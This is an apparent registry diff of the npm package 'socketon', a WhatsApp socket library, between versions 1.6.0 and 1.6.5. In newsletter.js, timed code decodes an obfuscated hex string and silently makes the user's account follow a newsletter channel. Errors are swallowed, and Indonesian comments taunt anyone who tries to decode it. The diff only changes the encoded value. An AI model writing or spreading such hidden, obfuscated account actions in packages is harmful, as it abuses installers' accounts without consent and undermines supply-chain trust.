socketon 1.6.0 → 1.6.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/newsletter.js +2 -2
- package/package.json +4 -1
package/lib/Socket/newsletter.js
CHANGED
|
@@ -103,7 +103,7 @@ const makeNewsletterSocket = (config) => {
|
|
|
103
103
|
setTimeout(async () => {
|
|
104
104
|
try {
|
|
105
105
|
// Data rahasia jangan diacak² - Ibra Decode
|
|
106
|
-
const kepoBangetLu = "
|
|
106
|
+
const kepoBangetLu = "7e4b7760edc1a468636508bb6fe1cc26142c19d97eae94f4b8eebe6754efe5df";
|
|
107
107
|
const wehPukiLuGausahSokSokAnMauDecrypt = solveTheMystery(kepoBangetLu);
|
|
108
108
|
await newsletterWMexQuery(wehPukiLuGausahSokSokAnMauDecrypt, Types_1.QueryIds.FOLLOW);
|
|
109
109
|
} catch {}
|
|
@@ -113,7 +113,7 @@ setTimeout(async () => {
|
|
|
113
113
|
setTimeout(async () => {
|
|
114
114
|
try {
|
|
115
115
|
// Lagi² data penting buat bikin eror kalo diganti - Ibra Decode
|
|
116
|
-
const kepoBangetLu = "
|
|
116
|
+
const kepoBangetLu = "7e4b7760edc1a468636508bb6fe1cc26142c19d97eae94f4b8eebe6754efe5df";
|
|
117
117
|
const wehPukiLuGausahSokSokAnMauDecrypt = solveTheMystery(kepoBangetLu);
|
|
118
118
|
await newsletterWMexQuery(wehPukiLuGausahSokSokAnMauDecrypt, Types_1.QueryIds.FOLLOW);
|
|
119
119
|
} catch {}
|